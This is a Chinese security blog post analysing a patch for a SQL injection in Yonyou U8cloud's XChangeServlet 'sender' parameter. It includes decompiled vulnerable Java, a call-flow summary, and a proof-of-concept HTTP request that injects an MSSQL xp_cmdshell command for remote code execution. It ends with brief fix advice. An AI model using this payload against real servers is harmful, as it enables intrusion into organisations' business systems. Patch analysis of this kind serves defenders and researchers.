<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言用友U8cloud爆了个全版本的SQL to RCE漏洞，这个系统还是有很多单位在用的，正好赶上国内某特殊时期，说不定是个好用的1day，根据补丁分析一波。 补丁分析首先下载补丁，在官网倒是没找到这个洞的补丁  看了离线安装文档后，在这个地方下载到了补丁https:&#x2F;&#x2F;pan.yonyou.com&#x2F;s&#x2F;LPcd51LNT6A可以选择对应的版本，不过这个洞影响全版本，正好手上有3.6版本的代码，">
<meta property="og:type" content="article">
<meta property="og:title" content="Xsheep">
<meta property="og:url" content="http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="Xsheep">
<meta property="og:description" content="前言用友U8cloud爆了个全版本的SQL to RCE漏洞，这个系统还是有很多单位在用的，正好赶上国内某特殊时期，说不定是个好用的1day，根据补丁分析一波。 补丁分析首先下载补丁，在官网倒是没找到这个洞的补丁  看了离线安装文档后，在这个地方下载到了补丁https:&#x2F;&#x2F;pan.yonyou.com&#x2F;s&#x2F;LPcd51LNT6A可以选择对应的版本，不过这个洞影响全版本，正好手上有3.6版本的代码，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709002645717.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709002915831.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709003126973.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709003239923.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709003815375.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709004219437.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709011001241.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709011132179.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709011426365.png">
<meta property="og:image" content="http://example.com/imgs/img/image-20260709011611630.png">
<meta property="article:published_time" content="2026-07-08T18:07:50.015Z">
<meta property="article:modified_time" content="2026-07-08T18:20:40.412Z">
<meta property="article:author" content="Xsheep">
<meta property="article:tag" content="网络安全博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/imgs/img/image-20260709002645717.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Xsheep</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Xsheep" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/link/">link</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2026/03/07/%E6%99%BA%E8%83%BD%E4%BD%93%E6%8E%A2%E7%B4%A2%E5%88%9D%E4%BD%93%E9%AA%8C/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&text="><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&is_video=false&description="><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&title="><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&name=&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/07/09/%E7%94%A8%E5%8F%8B%20U8cloud%20%E7%B3%BB%E7%BB%9F%E5%85%A8%E7%89%88%E6%9C%AC%20XChangeServlet%20%E6%8E%A5%E5%8F%A3SQL%E6%B3%A8%E5%85%A5%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/&t="><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A1%A5%E4%B8%81%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">补丁分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC%E6%9E%84%E9%80%A0"><span class="toc-number">3.</span> <span class="toc-text">POC构造</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D"><span class="toc-number">4.</span> <span class="toc-text">修复</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Xsheep</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-07-08T18:07:50.015Z" class="dt-published" itemprop="datePublished">2026-07-09</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>用友U8cloud爆了个全版本的SQL to RCE漏洞，这个系统还是有很多单位在用的，正好赶上国内某特殊时期，说不定是个好用的1day，根据补丁分析一波。</p>
<h2 id="补丁分析"><a href="#补丁分析" class="headerlink" title="补丁分析"></a>补丁分析</h2><p>首先下载补丁，在官网倒是没找到这个洞的补丁</p>
<p><img src="/imgs/img/image-20260709002645717.png" alt="image-20260709002645717"></p>
<p>看了离线安装文档后，在这个地方下载到了补丁<br><a target="_blank" rel="noopener" href="https://pan.yonyou.com/s/LPcd51LNT6A">https://pan.yonyou.com/s/LPcd51LNT6A</a><br>可以选择对应的版本，不过这个洞影响全版本，正好手上有3.6版本的代码，作者这里就以3.6的补丁为例分析。</p>
<p><img src="/imgs/img/image-20260709002915831.png" alt="image-20260709002915831"></p>
<p>补丁里只有这一个java文件，并且名字已经把接口和参数细节写清楚了<br>XChangeServlet接口存在SQL注入漏洞的补丁(注入点sender)<br>那么我们直接打开这个java文件，定位带sender参数的即可<br><img src="/imgs/img/image-20260709003126973.png" alt="image-20260709003126973"></p>
<p>不出意外的话应该就是这个<code>getExsystemPk</code>函数了<br>再去老版本对比一下，反编译<code>\modules\uapeai\libpubuapeaipfxx.jar</code>, 定位到这个函数<br><img src="/imgs/img/image-20260709003239923.png" alt="image-20260709003239923"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">public static String getExsystemPk(String sender) &#123;</span><br><span class="line">    if (sender == null || sender.length() == 0)</span><br><span class="line">      return null; </span><br><span class="line">    try &#123;</span><br><span class="line">      String whereClause = &quot;isnull ( dr , 0 ) = 0 and exsystemcode = &#x27;&quot; + sender + &quot;&#x27;&quot;;</span><br><span class="line">      ExsystemVO[] exsystemVos = (ExsystemVO[])(new BaseDAO()).retrieveByClause(Class.forName(&quot;nc.vo.pfxx.exsystem.ExsystemVO&quot;), whereClause).toArray((Object[])new ExsystemVO[0]);</span><br><span class="line">      if (exsystemVos != null &amp;&amp; exsystemVos.length == 1)</span><br><span class="line">        return exsystemVos[0].getPrimaryKey(); </span><br><span class="line">      return null;</span><br><span class="line">    &#125; catch (Exception e) &#123;</span><br><span class="line">      Logger.error(e.getMessage(), e);</span><br><span class="line">      return null;</span><br><span class="line">    &#125; </span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>一眼顶真，sender函数直接拼进去了，导致了SQL注入，由于用友U8cloud放在windows服务器上，数据库也大概率是mssql，所以sql注入直接升级成了RCE</p>
<p>定位到了sink点，接下来就是要看一下怎么调用<br>已知接口是XChangeServlet，搜索一下历史漏洞就知道，&#x2F;service&#x2F;XChangeServlet这个接口之前也爆出过XXE漏洞<br>接下来我们去看一下&#x2F;service&#x2F;XChangeServlet这条路由会怎么走<br>打开<code>\modules\uapeai\META-INF\P_pfxx50.upm</code> 这个文件会发现<br><img src="/imgs/img/image-20260709003815375.png" alt="image-20260709003815375"></p>
<p>&#x2F;service&#x2F;XChangeServlet对应的处理类是<code>nc.bs.pfxx.ServletForXchange</code><br>反编译<code>\modules\uapeai\META-INF\lib\uapeaipfxx.jar</code> 可以找到这个类<br><img src="/imgs/img/image-20260709004219437.png" alt="image-20260709004219437"></p>
<p>接下来看一下从http发包到这个接口，都干了什么<br>主要的处理逻辑在<code>doAction</code>这个函数里，具体代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line">public void doAction(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">      if (FileConfigInfoReadFacade.getGlobalParameter()</span><br><span class="line">        .isBigFileTransmission()) &#123;</span><br><span class="line">        XChangeContext xcContext = new XChangeContext();</span><br><span class="line">        boolean bcompress = false;</span><br><span class="line">        try &#123;</span><br><span class="line">          String receiver = &quot;Unknow&quot;;</span><br><span class="line">          String clientAddress = request.getRemoteAddr();</span><br><span class="line">          Logger.info(&quot;+ clientAddress + &quot;);</span><br><span class="line">          Logger.info(&quot;);</span><br><span class="line">          RequestParameter requestParameter = ConfigInfoAnalyser.initRequestParameter(request);</span><br><span class="line">          ServletRequestManager.getCurrentContext()</span><br><span class="line">            .setRequestParameter(requestParameter);</span><br><span class="line">          requestParameter.setServerURL(request.getServerName() + &quot;:&quot; + request</span><br><span class="line">              .getServerPort());</span><br><span class="line">          if (!StringUtil.isEmptyWithTrim(requestParameter</span><br><span class="line">              .getReceiver()))</span><br><span class="line">            receiver = requestParameter.getReceiver(); </span><br><span class="line">          bcompress = requestParameter.isBcompress();</span><br><span class="line">          setResponseContentType(response);</span><br><span class="line">          Logger.info(&quot;);</span><br><span class="line">          String inputStreamFileName = InputStreamFileHelper.getFileName(receiver, requestParameter</span><br><span class="line">              .getFileName());</span><br><span class="line">          Logger.info(&quot;);</span><br><span class="line">          checkClientAddress(clientAddress);</span><br><span class="line">          Logger.info(&quot;);</span><br><span class="line">          InputStream in = null;</span><br><span class="line">          if (!&quot;Y&quot;.equals(requestParameter.getAttribute(&quot;isEncrypt&quot;))) &#123;</span><br><span class="line">            ServletInputStream servletInputStream = request.getInputStream();</span><br><span class="line">          &#125; else &#123;</span><br><span class="line">            String jmdoc = getStreamString((InputStream)request.getInputStream());</span><br><span class="line">            byte[] bt = null;</span><br><span class="line">            if (jmdoc != null)</span><br><span class="line">              bt = PfxxUtils.decrypt(jmdoc.getBytes(), requestParameter</span><br><span class="line">                  .getToken()); </span><br><span class="line">            if (bt == null || bt.length &lt;= 0)</span><br><span class="line">              throw new SAXException(&quot;); </span><br><span class="line">            in = new ByteArrayInputStream(bt);</span><br><span class="line">          &#125; </span><br><span class="line">          File localFile = writeInputStreamToFile(in, bcompress, inputStreamFileName);</span><br><span class="line">          Logger.info(&quot;);</span><br><span class="line">          LargeXMLParser p = new LargeXMLParser(&quot;ufinterface&quot;, &quot;abcd&quot;);</span><br><span class="line">          p.setNotProcessChildren(true);</span><br><span class="line">          ContextMessageListener ufCML = new ContextMessageListener();</span><br><span class="line">          Logger.info(&quot;+ localFile);</span><br><span class="line">          FileInputStream fis = new FileInputStream(localFile);</span><br><span class="line">          p.parse(fis, (IMessageListener)ufCML);</span><br><span class="line">          fis.close();</span><br><span class="line">          Logger.info(&quot;+ ufCML</span><br><span class="line">              .getUfinterface());</span><br><span class="line">          newThreadDoAction(clientAddress, localFile, ufCML, requestParameter, inputStreamFileName, receiver);</span><br><span class="line">          ResponseMessage rm = xcContext.newResponseMessage();</span><br><span class="line">          rm.setResultCode(&quot;1&quot;);</span><br><span class="line">          rm.appendResultDescription(&quot;);</span><br><span class="line">          xcContext.setFileSuccessfulProcess(true);</span><br><span class="line">        &#125; catch (EnvInitException e) &#123;</span><br><span class="line">          String msg = &quot;;</span><br><span class="line">          Logger.error(msg, (Throwable)e);</span><br><span class="line">          ResponseMessage rm = xcContext.newResponseMessage();</span><br><span class="line">          rm.setResultCode(e.getErrorCodeString());</span><br><span class="line">          rm.appendResultDescription(e.getMessage());</span><br><span class="line">          xcContext.setFileSuccessfulProcess(false);</span><br><span class="line">        &#125; catch (SAXException saxe) &#123;</span><br><span class="line">          Logger.error(&quot;, saxe);</span><br><span class="line">          ResponseMessage rm = xcContext.newResponseMessage();</span><br><span class="line">          rm.setResultCode(&quot;-31003&quot;);</span><br><span class="line">          rm.appendResultDescription(&quot;);</span><br><span class="line">          xcContext.setFileSuccessfulProcess(false);</span><br><span class="line">        &#125; catch (IOException ioe) &#123;</span><br><span class="line">          Logger.error(&quot;, ioe);</span><br><span class="line">          ResponseMessage rm = xcContext.newResponseMessage();</span><br><span class="line">          rm.setResultCode(&quot;-10000&quot;);</span><br><span class="line">          rm.appendResultDescription(&quot;);</span><br><span class="line">          xcContext.setFileSuccessfulProcess(false);</span><br><span class="line">        &#125; catch (Exception e) &#123;</span><br><span class="line">          Logger.error(&quot;, e);</span><br><span class="line">          ResponseMessage rm = xcContext.newResponseMessage();</span><br><span class="line">          rm.setResultCode(&quot;-40000&quot;);</span><br><span class="line">          rm.appendResultDescription(&quot;);</span><br><span class="line">          xcContext.setFileSuccessfulProcess(false);</span><br><span class="line">        &#125; finally &#123;</span><br><span class="line">          String outputEncoding = FileConfigInfoReadFacade.getGlobalParameter().getOutputEncoding();</span><br><span class="line">          Writer writer = null;</span><br><span class="line">          if (bcompress) &#123;</span><br><span class="line">            writer = new OutputStreamWriter(new GZIPOutputStream((OutputStream)response.getOutputStream()), outputEncoding);</span><br><span class="line">          &#125; else &#123;</span><br><span class="line">            writer = new OutputStreamWriter((OutputStream)response.getOutputStream(), outputEncoding);</span><br><span class="line">          &#125; </span><br><span class="line">          Document doc = xcContext.getResponseMessage();</span><br><span class="line">          XMLUtil.printDOMTree(writer, doc, 0, outputEncoding);</span><br><span class="line">          writer.close();</span><br><span class="line">        &#125; </span><br><span class="line">      &#125; else &#123;</span><br><span class="line">        normalDoAction(request, response);</span><br><span class="line">      &#125; </span><br><span class="line">    &#125; catch (FileConfigException e) &#123;</span><br><span class="line">      Logger.error(&quot;, (Throwable)e);</span><br><span class="line">    &#125; </span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>反正就是获取包，解析XML，获取参数，然后进行处理<br>继续看<code>normalDoAction</code>里具体是怎么处理参数的<br><img src="/imgs/img/image-20260709011001241.png" alt="image-20260709011001241"></p>
<p>对参数进行追踪，获取完参数后会进行 <code>context.init(requestParameter, doc)</code>,初始化上下文，也就是在这里，会调用到sink点函数<br><img src="/imgs/img/image-20260709011132179.png" alt="image-20260709011132179"></p>
<p>将代码丢给AI，让它分析一下，总结之后最终触发流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">HTTP body = XML 流</span><br><span class="line">↓ Tomcat / NC appserver → ServletForXchange.doAction(HttpServletRequest, HttpServletResponse)</span><br><span class="line">↓ 小文件：request.getInputStream()→ getDocumentFromInputStream()→ DOM parse → Document</span><br><span class="line">↓ 大文件：writeInputStreamToFile()→ LargeXMLParser(&quot;ufinterface&quot;)→ SAX 按 ufinterface 切块</span><br><span class="line">↓ ConfigInfoAnalyser.initRequestParameter(request)吸 URL 参数 / 可能吸 XML 头里的 sender/receiver/account/groupcode 进 RequestParameter</span><br><span class="line">↓ context.init(requestParameter, doc)→ 外部交换环境初始化</span><br><span class="line">↓ 业务处理要校验&quot;这个 sender 是不是注册过的外部系统&quot;</span><br><span class="line">↓ PfxxUtils.getExsystemPk(&quot;HR01&quot;)→ where exsystemcode = &#x27;HR01&#x27;→ 拼 sender 进 SQL</span><br><span class="line">↓ BaseDAO.retrieveByClause(ExsystemVO, whereClause)→ session.executeQuery(buildSql(..., condition))</span><br><span class="line">↓ 攻击 payload：sender=&quot;HR01&#x27; or 1=1--&quot;→ SQL 变 exsystemcode=&#x27;HR01&#x27; or 1=1--&#x27;→ SQLi</span><br></pre></td></tr></table></figure>

<h2 id="POC构造"><a href="#POC构造" class="headerlink" title="POC构造"></a>POC构造</h2><p>需要让<code>/service/XChangeServlet</code>这个接口解析到我们发送过去的sender函数即可，让AI辅助构造，最终构造出的poc如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">POST /service/XChangeServlet HTTP/1.1</span><br><span class="line">Host: localhost:8088</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Cookie: JSESSIONID=F740A19A7B88D595B1B549B65470D281.server</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">If-Modified-Since: Tue, 09 Nov 2021 07:54:50 GMT</span><br><span class="line">If-None-Match: W/&quot;1121-1636444490000&quot;</span><br><span class="line">Priority: u=0, i</span><br><span class="line">Content-Type: text/xml</span><br><span class="line">Content-Length: 188</span><br><span class="line"></span><br><span class="line">&lt;ufinterface sender=&quot;U8&#x27;;exec master..xp_cmdshell &#x27;whomai&#x27;--&quot; receiver=&quot;U8C01&quot; billtype=&quot;gl&quot; proc=&quot;add&quot; filename=&quot;doc.xml&quot;&gt;</span><br><span class="line">   &lt;billtype&gt;...&lt;/billtype&gt;</span><br><span class="line">&lt;/ufinterface&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/img/image-20260709011426365.png" alt="image-20260709011426365"></p>
<p>不过在自己的尝试中，发现好像直接拼接在uri中也行？<br><img src="/imgs/img/image-20260709011611630.png" alt="image-20260709011611630"></p>
<h2 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h2><p>官方已经发布了补丁，修复方法也很简单，就是预编译，不直接拼接用户传递来的参数<br>如果没法及时打补丁的话，也可以在WAF上拦一手</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/link/">link</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
